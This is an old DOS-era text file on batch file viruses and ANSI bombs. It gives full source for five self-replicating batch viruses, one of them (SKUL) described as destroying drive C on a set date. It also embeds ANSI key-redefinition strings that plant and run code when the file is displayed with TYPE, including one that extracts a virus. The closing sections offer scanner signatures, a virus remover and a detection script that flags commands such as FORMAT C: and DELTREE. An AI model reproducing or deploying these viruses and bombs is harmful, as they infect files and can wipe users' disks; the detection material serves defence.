---------------------------------
Batch File Viruses and ANSI Bombs
---------------------------------
This file has no copyright (C) 1995 - use it, steal it, say you wrote
it yourself, I don't care. This file might not even have an author.
I don't want fame. I just want people to be aware of this stuff.
As long as you don't try to cut out and run the programs and view
this file with a text viewer, this file is totally harmless. But...
This file contains ANSI and non-printable characters INCLUDING strings
that can redefine keys on the keyboard! DO NOT TYPE THIS DOCUMENT unless
you know what you are doing! Use EDIT or LIST (or almost any text viewer)
to read this document.
The batch files presented (and one especially) can be VERY DANGEROUS
under certain circumstances!!! DO NOT CUT OUT AND RUN SKUL unless you
make damn sure it's been deactivated! It's supposed to be but don't
count on it. It's not my intention to format someone's drive, only to
demonstrate how trivial it is to do. I don't know if it even works.
It probably does, so DON'T PLAY WITH IT. There is no recovery other
than re-formatting if it 'goes off'. It can't unless you deliberately
cut it out and save it to a batch file then run it. Even if someone
modified this document to 'bomb load' it you'd still have to TYPE
this file to load the bomb. Again, ALWAYS use a viewer. Perhaps the
possibility of this happening will break people of the TYPE habbit.
I will not accept any responsibility for anything contained in this
file. What you do with this information is your business but I'd prefer
you'd use it to protect and educate yourself and not to hurt someone.
You, the reader of this document, assume ALL responibility for whatever
you do with the information. As with all things in life.
If you are TYPE'ing this file (or using MORE) the following keys will
be affected if ANSI.SYS is running and unprotected...
* The uppercase Z key will extract the ZEP batch virus (very tame) and
execute it, provided this file is named BATV.TXT and in the current
directory. This virus can infect one batch in the current or parent
directory with each run. Make sure you track any infections carefully!
* The BackSpace key will flash Hey! each time it's pressed but will
otherwise still work.
* The <`> key will first be defined to 'XoP_B XoP_' then redefined in
the next section to write out a short batch file and run it. The batch
will then display Working... while it does a directory while 'CTTY NUL'
is in effect to simulate lots of disk noise. Then it restores the
console and deletes itself producing a BATCH FILE MISSING error.
If you abort by Ctrl-Break the computer will probably lock up.
None of these actions should affect any data except for batch files.
Before attempting to demonstrate any of these effects read through this
file with a text viewer completely!
If you are using any kind of DOS command to view this file, and these
are not the effects you wish to demonstrate EXIT NOW! (Ctrl-Break)
------------------------------------------------------------------------
Batch Viruses
-------------
It is generally assumed in the virus community that batch files are not
viable targets for viral infections. However my own experiments seem to
disprove this notion. It is true that existing samples (at least what
I've seen) are not so hot, but do not assume it can't be done. It just
takes a little batch know-how.
Presented here are five batch viruses that actually work. On modern systems
they are practically invisible unless they activate. To people that pay
attention to their files these are not much of a threat, but we're often
so busy protecting the exe's something like this can go unnoticed. Removal
is easy - use any editor to remove it from all affected batches then delete
the hidden root file if present (you have to remove the hidden attribute).
Common traits...
- They infect only un-infected batch files (no re-infection of same type).
- No effect the host file's functionality. Files still work normally.
- Virus gets control AFTER host batch completes (or hits last line).
- They travel using the .. method as well as attacking the current directory
- Exist indepenent of any other files. Totally parasitic.
- DOS 5 or better may be 'required', I'm not sure.
ZEP (165) - The smallest so far! Except for GeeZ.
XOP (361) - Infects two batches per run.
POT (685) - Infects one batch per run. If it can't infect anything
it drops two ANSI bombs (space bar flashes a message and
the ` key runs the root copy of the virus) and checks for
'00' anywhere in the current time. If so it displays a
silly message, giving itself away.
SKUL (497) - This is a DANGEROUS file!!! It will overwrite over 8000
sectors of drive C on the 20th of any month!!! DO NOT RUN!
I do not normally write destructive code but did in this
case so folks might take this more seriously. Hides itself
from TYPE but does not define any keys.
ZOP_B (615) - Infects two files per run. If infected batch files are
TYPE'd the ` key will be redefined to run itself. The key
is undefined after the virus runs. You won't see much
when you TYPE it.
The ANSI tricks work only if ANSI.SYS is loaded. All of these work on
the same basic principle: Use a key-string specific to the virus on EVERY
line. The FIND command is used to extract the viral code out of the host
for eventual copy to the victom files, and also to check for previous
infection. All of these except ZEP keep a hidden copy of themselves in
the root of drive C: to permit operation even if the infected batch being
run is not in the current directory. If the copy is not present they will
create it when run from the current directory. ZEP will infect only if
the infected batch is run from the current directory.
Two methods are used to find files. The first, used by XOP, POT and ZOP_B,
loops for every batch file found by calling the root copy. The second
method merely checks the LAST batch found and avoids the looping. While
much faster, it will only infect one file unless files are moved around
making it a 'slow infector'. To give credit where credit is due, this
idea (one for.. do set... line) sort-of comes from an example in Vir-101.
The first method is of my own devising and behaves closer to the real thing
but would be obvious if run without a cache or in a directory containing
many batch files. Even if it infects only one or two at a time it still has
to loop for all of them since batch doesn't provide an easy way to terminate
a loop. Even so, it's pretty fast most of the time - less than a second.
The 101 way, although limited, is faster because the loop calls no code.
--ZEP.BAT------------------------------------------------------------------
@echo off%[ZeP]%
if not exist %0.bat goto ZeP
for %%f in (*.bat ..\*.bat) do set ZeP=%%f
find /i "ZeP"<%ZeP%>nul
if errorlevel 1 find "ZeP"<%0.bat>>%ZeP%
:ZeP
--XOP.BAT------------------------------------------------------------------
@echo off%[XoP]%
if '%XoP%=='11 goto XoP2
if '%2=='_ goto XoP1
if exist C:\XoP.bat goto XoP
if not exist %0.bat goto XoP2
find "XoP"<%0.bat>C:\XoP.bat
attrib C:\XoP.bat +h
:XoP
for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _
set XoP=
goto XoP2
:XoP1
find /i "XoP"<%1>nul
if not errorlevel 1 goto XoP2
type C:\XoP.bat>>%1
set XoP=%XoP%1
:XoP2
--POT.BAT------------------------------------------------------------------
@echo off%_PoT%
if '%PoT%=='I goto PoTz
if '%1=='_ goto PoTi
if exist C:\PoT.bat goto PoT
if not exist %0.bat goto PoTz
find "PoT"<%0.bat>C:\PoT.bat
attrib C:\PoT.bat +h
:PoT Makes You Feel Goodz
for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f
if '%PoT%=='I goto PoTf
set PoT=
echo %PoT%[32;"You're Stoned! "p
echo %PoT%[96;"C:\PoT";13p%PoT%[2A
echo.%_PoT%|time|find "00">nul
if errorlevel 1 goto PoTf
echo %PoT%[1A%PoT%[s%PoT%[1;37;44m
echo %PoT%[3;9H Let me outta here! %PoT%[0m%PoT%[u
:PoTf gold
set PoT=
goto PoTz
:PoTi nfect
find /i "PoT"<%2>nul
if not errorlevel 1 goto PoTz
type C:\PoT.bat>>%2
set PoT=I
:PoTz
--SKUL---------------------------------------------------------------------
::[8mSKuL
@echo off%[SKuL]%
echo.|date|find "20">nul%[SKuL]%
if errorlevel 1 goto SKuL1
echo SKuL Killing Hardfile...
::echo 09 M&M>SKuL.com
::SKuL
:SKuL1 [6A
if exist C:\SKuL goto SKuL2
if not exist %0.bat goto SKuL
find "SKuL"<%0.bat>C:\SKuL
attrib C:\SKuL +h
:SKuL2 [5A
set SKuL=C:\AUTOEXEC.BAT
for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f
if not exist %SKuL% goto SKuL
find /i "SKuL"<%SKuL%>nul
if errorlevel 1 type C:\SKuL>>%SKuL%
set SKuL=
:SKuL [7A[0m
--ZOP_B.BAT----------------------------------------------------------------
@echo off
::[8m --- [ZoP_B] Batch Infector ---
if '%2=='ZoP_ goto ZoP_1
if '%1=='ZoP_ echo ["`";"`"p
::["`";"ZoP_B ZoP_";13p
::[4AZoP_
if exist c:\ZoP_B.bat goto ZoP_
if not exist %0.bat goto ZoP_2
echo @echo Off>c:\ZoP_B.bat
find "ZoP_"<%0.bat>>c:\ZoP_B.bat
attrib c:\ZoP_B.bat +h
::[6AZoP_
:ZoP_
for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_
if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_
set ZoP_=
goto ZoP_2
::[6AZoP_
:ZoP_1
if '%ZoP_%=='11 goto ZoP_2
find "ZoP_"<%1>nul
if not errorlevel 1 goto ZoP_2
type c:\ZoP_B.bat>>%1
set ZoP_=%ZoP_%1
:ZoP_2
::ZoP_[7A[0m
--------------------------------------------------------------------------
ANSI Bombs
----------
The title says Batch Viruses and ANSI bombs, so here's the ANSI section.
Some of the above files contain ANSI bombs but they are not harmful.
ANSI bombs can be very harmful if you are not aware of them. As long
as you either do not run ANSI.SYS or if you do, fortify it with TBDRIVER
or something, or never use the TYPE command to look at files, and always
view batch files before you run them, you're OK. For starters, just
don't use the TYPE and MORE commands when dealing with new files, and
CHECK THOSE BAT FILES WITH EDIT before you run them.
Since someone could accidently TYPE this document, none of these examples
will do anything really harmful but hopefully will get the point across.
And the first one (I'm going to write this right now...) will extract
the ZEP batch virus from this file, assumed to be named BATV.TXT.
The bomb will be placed on the uppercase Z key. This is not a practical
example, a real bomb would do the return key or something more likely
to be pressed, and a real bomb would probably just go ahead and wipe
your drive out.
-------------------------------------------------------------
::["Z";"find ";34;"ZeP";34;"ZEP.BAT";13;"ZEP";13p
-------------------------------------------------------------
It will also copy the above line but I guess that's OK. It just becomes
part of the ZEP virus. The bomb won't work unless BATV.TXT is present.
This is boring. Sure, ANSI bombs can format your hard disk, but they
are limited as far as brains go. For example, it is impossible to write
a self contained ANSI bomb that plants the ZEP virus because you can't
redirect lines already containing redirection into a file.
A couple more then I quit.
--HEYBUG-(BACKSPACE KEY)----------------------
[8;"Hey! "p
----------------------------------------------
--SCARE--(` KEY)-----------
[96;96p
[96;"echo @echo off>~.bat
echo cls>>~.bat
echo echo Working...>>~.bat
echo ctty nul>>~.bat
echo dir \ /s>>~.bat
echo ctty con>>~.bat
echo del ~.bat>>~.bat
~
"p
---------------------------
Scan Strings
------------
Scanning for ANSI bombs and batch viruses can be somewhat tricky but is
possible if the scanner supports wildcard signatures. The batch viruses
and ANSI bombs presented here can be detected by the following HTSCAN
signature strings. ThunderByte's scanner also supports wildcards but
you'd probably have to convert them.
;-----HTSCAN Signatures-------------------------
;
; *** ANSI key codes ***
;
F Quoted Key Redefinition
BAT COM EXE
1B5B%73B%722%(250)22%770
F Entered Key Redefinition
BAT COM EXE
1B5B%F3B**3B313370
;
; *** Batch crap detectors ***
;
I BAT virus? (finds itself)
BAT
66//4669//496E//4E64//44%222%F22%23C%22530
I BAT virus? (BAT loop)
BAT
28%32A2E62//4261//4174//44%129%22064//446F//4F20
F Debugs file (could be danger)
BAT
0D0A64//4465//4562//4275//5567//47%23C
T Disk C: Killer! (int 26)
COM EXE SYS BAT
B002%FCD26
Batch Virus Remover
-------------------
This file will clean batch viruses of the type described in this document.
Basically, it removes all lines containing a specific string provided the
file also contains another specific string. Needless to say, if called
with the wrong string it will reduce your batches to mush, so be careful
if you have to use it (like if one of these toys gets away). As written
DOS 6 (or at least CHOICE.COM) is required because it confirms each
file before cleaning it. So you don't clean your original sample.
To use, determine the key string for the batch virus (the string present
on every line). For example say I have a bat virus that contains 'GeeZ'
in every line (here I go again) like in the following...
::
:: host file
::
ctty nul%_GeeZ%
for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a
find "GeeZ"<%GeeZ%
if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ%
ctty con%_GeeZ%
To remove it, enter CLEANBAT GeeZ then answer the prompts.
-------------- CLEANBAT.BAT -------------------------------
@echo off
if '%1=='%temp% goto remove
if exist C:\DOS\CHOICE.COM goto start
echo This batch requires CHOICE.COM in C:\DOS!
:start
echo **** Batch Virus Remover ****
echo.
echo Warning! If key is not unique this will destroy files!
echo Usage: CLEANBAT Key1 [Key2] where Key1 is the UNIQUE
echo signature used by the virus and Key2 is an identifying
echo string. If not specified then Key2 is set to Key1
echo.
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Will remove %ks% from files containing %is%. Proceed?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%"<%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done
-----------------------------------------------------------
ANSI / Bad Command Scanner
--------------------------
This is not as accurate as the signatures, and quite a bit slower,
but not unusably so. Actually it detects much more than the sigs do.
What this does is read through every file in the directory listing
any dangerous codes or commands it finds for each file. Obviously
the flags for batch commands are meaningless unless contained in
a batch file, and sometimes batches need to delete a file, so
consider the output as an early warning. Despite its simplistic
nature it will detect most types of key redefinition that I can
think of. NOTE - EscSeq is NOT really a warning, many color batches
and all ANSI screens contain this, but if KeyRedef, Key2 or Key3
shows up definitely check out the file.
To use, copy this to a directory on the path, then CD to the directory
containing the files and enter 'CHKANSI'. To scan just one batch or
specific groups of files enter something like 'CHKANSI *.BAT *.ANS'.
This needs a fair amout (maybe 120 bytes) of environment to work
properly. If you encounter errors enter 'COMMAND /E:512' at the prompt.
Consider adding 'SHELL=C:\DOS\COMMAND.COM /E:512 /P' to your CONFIG.SYS
if this or a similar line is not present.
NOTE - check the set esc= and set tab= lines - these should set a single
escape character and tab character repspectively. EDIT will expand the
tab character to spaces. All this does is make the listing look better
but the esc= line is vital! Make sure there are no spaces after the
escape character or it won't work!! If you use EDIT to split this out,
redo the set tab= line - delete the spaces (until line pops up-9 times)
then press . You have to do this each time you load
it into EDIT. If you forget it will still function but the flags will
no longer line up evenly. Just a pick.
--------------- CHKANSI.BAT -------------------------------
@echo off
if '%2=='Loop goto loop
echo *** ANSI/BATCH SCANNER ***
set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9
if '%mask%==' set mask=*.*
for %%f in (%mask%) do call %0 %%f Loop
goto done
:loop
if not exist %1 goto done
set line=
:: escape and tab characters
set esc=
set tab=
find "%esc%["<%1>nul
if not errorlevel 1 set line=%line%EscSeq
find /i "$e["<%1>nul
if not errorlevel 1 set line=%line%PromptSeq
find ";13p"<%1>nul
if not errorlevel 1 set line=%line%KeyRedef
if '%line%==' goto checkbad
find """p"<%1>nul
if not errorlevel 1 set line=%line%Key2
set hit=0
find "0p"<%1>nul
if not errorlevel 1 set hit=1
find "1p"<%1>nul
if not errorlevel 1 set hit=1
find "2p"<%1>nul
if not errorlevel 1 set hit=1
find "4p"<%1>nul
if not errorlevel 1 set hit=1
find "5p"<%1>nul
if not errorlevel 1 set hit=1
find "6p"<%1>nul
if not errorlevel 1 set hit=1
find "7p"<%1>nul
if not errorlevel 1 set hit=1
find "8p"<%1>nul
if not errorlevel 1 set hit=1
find "9p"<%1>nul
if not errorlevel 1 set hit=1
if %hit%==1 set line=%line%Key3
:checkbad
find /i "DEL "<%1>nul
if not errorlevel 1 set line=%line%Del
find /i "DELTREE"<%1>nul
if not errorlevel 1 set line=%line%Deltree
find /i "DEBUG"<%1>nul
if not errorlevel 1 set line=%line%Debug
find /i "ATTRIB "<%1>nul
if not errorlevel 1 set line=%line%Attrib
find /i "FORMAT C:"<%1>nul
if not errorlevel 1 set line=%line%Format
find /i "*.BAT"<%1>nul
if not errorlevel 1 set line=%line%BAT
find /i "*.EXE"<%1>nul
if not errorlevel 1 set line=%line%EXE
find /i "*.COM"<%1>nul
if not errorlevel 1 set line=%line%COM
echo %1 %tab%%line%
:done
set mask=
set line=
set hit=
set esc=
set tab=
-----------------------------------------------------------